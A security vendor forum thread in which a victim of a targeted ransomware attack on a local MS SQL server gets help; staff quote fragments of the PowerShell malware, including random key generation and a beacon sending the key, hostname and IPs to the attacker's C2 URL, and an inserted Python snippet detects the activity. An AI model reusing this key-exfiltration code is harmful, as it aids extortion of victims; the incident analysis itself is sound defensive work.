ivaylogrig 0 Posted May 18
Hello, My computer was infected with cyberfear@decryptor. eis_logs.zip
Administrators Marcos 5,274 Posted May 19
First of all, you have misconfigured ESET Internet Security. Attacks were conducted against MS SQL Server running on the machine but you have configured ESET not to block them.
Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks: https://www.abuseipdb.com/check/198.147.26.74
The following detections were stemming from a compromised MS SQL server:
- a variant of MSIL/HackTool.BadPotato.C trojan
- a variant of Win64/Kryptik.EDF trojan
- a variant of Win64/Agent.DJU trojan
I'd suggest that you:
1. Remove all IDS exceptions
2. Supply me with:
a) a couple of encrypted files, ideally Office documents
b) the ransomware note with payment instructions, if it exists
ivaylogrig 0 Posted May 19 Author
1 hour ago, Marcos said:
First of all, you have misconfigured ESET Internet Security. Attacks were carried out against the MS SQL Server running on the machine, but you have configured ESET not to block them. Also you have created an exception for 2 IP addresses blocked by ESET, one of which is a known source of attacks: https://www.abuseipdb.com/check/198.147.26.74 The following detections stem from a compromised MS SQL server: a variant of MSIL/HackTool.BadPotato.C trojan, a variant of Win64/Kryptik.EDF trojan, a variant of Win64/Agent.DJU trojan. I would suggest that you: 1, Remove all IDS exceptions 2, Supply me with: a) a few encrypted files, ideally Office documents b) the ransomware note with payment instructions, if it exists
I am attaching some encrypted files and a ransomware note. Infected.zip
Administrators Marcos 5,274 Posted May 19
Unfortunately the files didn't help to determine how files were encrypted. It could have been a ransomware or a legit encryption tool that an adversary ran after gaining access to the machine.
ivaylogrig 0 Posted May 19 Author
How to clean the machine?
Administrators Marcos 5,274 Posted May 19
Just run a full disk scan to make sure that no malware is detected. Your computer should be clean. The ransomware usually removes itself, or the adversary deletes it after encryption.
itman 1,748 Posted May 19
If the files were encrypted with BlackMatter ransomware, it might be possible to decrypt them: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902
ivaylogrig 0 Posted May 19 Author
1 hour ago, itman said:
If the files were encrypted with the BlackMatter ransomware, it may be possible to decrypt them: https://forum.eset.com/topic/39294-pc-infected-with-cyberfeardecryptor-sexaxglsy-files/?do=findComment&comment=178902
How do I know this?
Administrators Marcos 5,274 Posted May 19
Normally you could check it via https://id-ransomware.malwarehunterteam.com but in this case the variant is unknown. The files could be encrypted by an attacker running a legitimate encryption tool when connected to your machine.
Administrators Marcos 5,274 Posted May 19
It's a new Powershell malware, will be detected shortly as PowerShell/Filecoder.BM trojan. It was probably a targeted attack since it was not found on any other machine with ESET installed so far.
ivaylogrig 0 Posted May 19 Author
Yes, the attack is targeted. I believe it is happening through a backup program of an accounting program I use.
ivaylogrig 0 Posted May 19 Author
9 minutes ago, Marcos said:
This is a new Powershell malware; it will soon be detected as PowerShell/Filecoder.BM trojan. It was probably a targeted attack, since so far it has not been found on any other machine with ESET installed.
Will we be protected in the future?
itman 1,748 Posted May 19
26 minutes ago, Marcos said:
It's a new Powershell malware
Would Eset's recommended anti-ransomware rule to block any child process startup from PowerShell.exe have detected and blocked it?
Administrators Marcos 5,274 Posted May 19
The PowerShell script infects local MS SQL databases by running "sqlcmd -S localhost ..." except 'master', 'tempdb', 'model', 'msdb'. Unfortunately the encryption key is random:

$PSRKey = -join ((48..57) + (65..90) + (97..122) | Get-Random -Count 24 | % {[char]$_})

and is sent to the attacker's C&C server:

$C2Data = @"
[>] Key: $PSRKey
[>] Hostname: $computer
[>] Current User: $domain$user
[>] Current Time: $time
[>] Local IP: $localIP
[>] Public IP: $publicIP
"@
$url = "http://$C2Server`:$C2Port/data"
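An added detection example in Python, not code from the thread or from ESET: it classifies constructed Sysmon-style process-creation records for the behaviour Marcos describes (PowerShell spawning sqlcmd against a local non-system database, which is also the child-process rule itman asks about) and parses the "[>] Field: value" beacon layout quoted above so an IR analyst who has the outbound POST in a proxy log or capture can recover the key. The event records, paths, hostnames and the key value are all constructed.

```python
import re

# System databases the script skips, per Marcos's description of the sqlcmd loop.
SYSTEM_DBS = {"master", "tempdb", "model", "msdb"}
# One "[>] Field: value" line of the beacon body.
BEACON_RE = re.compile(r"^\[>\]\s*([^:]+):\s*(.*)$", re.MULTILINE)

# Constructed Sysmon-style process-creation records (not real telemetry from the thread).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Tools\sqlcmd.exe",
     "cmdline": 'sqlcmd -S localhost -d Microinvest -Q "SELECT name FROM sys.tables"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Tools\sqlcmd.exe",
     "cmdline": 'sqlcmd -S localhost -d master -Q "SELECT @@VERSION"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r"wmic process call create C:\ProgramData\update.exe"},
]

# Constructed beacon body in the layout Marcos quoted; the key is made up.
SAMPLE_BEACON = """[>] Key: Qx7tR2mK9pL4vN8bW3zH6yD1
[>] Hostname: ACCT-PC01
[>] Current User: WORKGROUP\\ivaylo
[>] Current Time: 2024-05-18 03:12:44
[>] Local IP: 192.168.1.20
[>] Public IP: 203.0.113.9"""

def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]

def classify_event(ev):
    """Return the reasons a process-creation record looks like this attack (empty if none)."""
    reasons = []
    parent, image, cmd = _basename(ev["parent"]), _basename(ev["image"]), ev["cmdline"]
    # The rule itman asks about: PowerShell spawning a child such as sqlcmd/wmic/cmd.
    if parent == "powershell.exe" and image in {"sqlcmd.exe", "wmic.exe", "cmd.exe"}:
        reasons.append(f"powershell.exe spawned {image}")
    # sqlcmd against a local user (non-system) database, which is what the script does.
    db = re.search(r"\s-d\s+(\S+)", cmd)
    if image == "sqlcmd.exe" and re.search(r"\s-S\s+localhost", cmd) and db \
            and db.group(1).lower() not in SYSTEM_DBS:
        reasons.append(f"sqlcmd against local user database {db.group(1)}")
    return reasons

def find_suspicious(events):
    return [(i, r) for i, ev in enumerate(events) if (r := classify_event(ev))]

def parse_beacon(body):
    """Map beacon fields to values; the Key field is what an IR team needs from a captured POST."""
    return {f.strip(): v.strip() for f, v in BEACON_RE.findall(body)}
```

Recovering the key from a captured beacon only helps if the script's encryption routine is also recovered; the thread does not state which cipher it uses.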
itman 1,748 Posted May 19
Perhaps Mallox ransomware:
Quote
The attacker created a stored procedure named cmd_exec that calls the SqlShell malware. Finally, it called the stored procedure to execute a command passed in parameter which performs the following actions: Using echo and redirect, it creates a PowerShell script that downloads a binary and saves it to the ProgramData folder; It then calls PowerShell to execute the script; Finally, It uses WMIC to execute the binary.
https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/
safety 8 Posted May 20
On 5/19/2024 at 4:20 PM, ivaylogrig said:
I am attaching some encrypted files and a ransomware note. Infected.zip
Can you upload these files to a cloud drive, Google or Yandex, and provide a link to download them, so the type of ransomware can be determined based on the encrypted file and the ransom note?
Administrators Marcos 5,274 Posted May 20
It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.
itman 1,748 Posted May 20
3 hours ago, Marcos said:
It appears there has been a supply chain attack going on and targeting users of the Bulgarian accounting software Microinvest that uses SQL Express.
The beginnings of another infamous Petya-like attack?
Quote
It was believed that the software update mechanism of M.E.Doc [uk]—a Ukrainian tax preparation program that, according to F-Secure analyst Mikko Hyppönen, "appears to be de facto" among companies doing business in the country—had been compromised to spread the malware.[13][18][19] Analysis by ESET found that a backdoor had been present in the update system for at least six weeks prior to the attack, describing it as a "thoroughly well-planned and well-executed operation".[20] The developers of M.E.Doc denied that they were entirely responsible for the cyberattack, stating that they too were victims.[18][21][22][23]
https://en.wikipedia.org/wiki/Petya_(malware_family)
itman 1,748 Posted May 20
Somewhat coincidental is that the infamous 2019 Bulgarian Tax Agency hack was SQL injection based: https://www.acunetix.com/blog/web-security-zone/sql-injection-compromises-entire-country/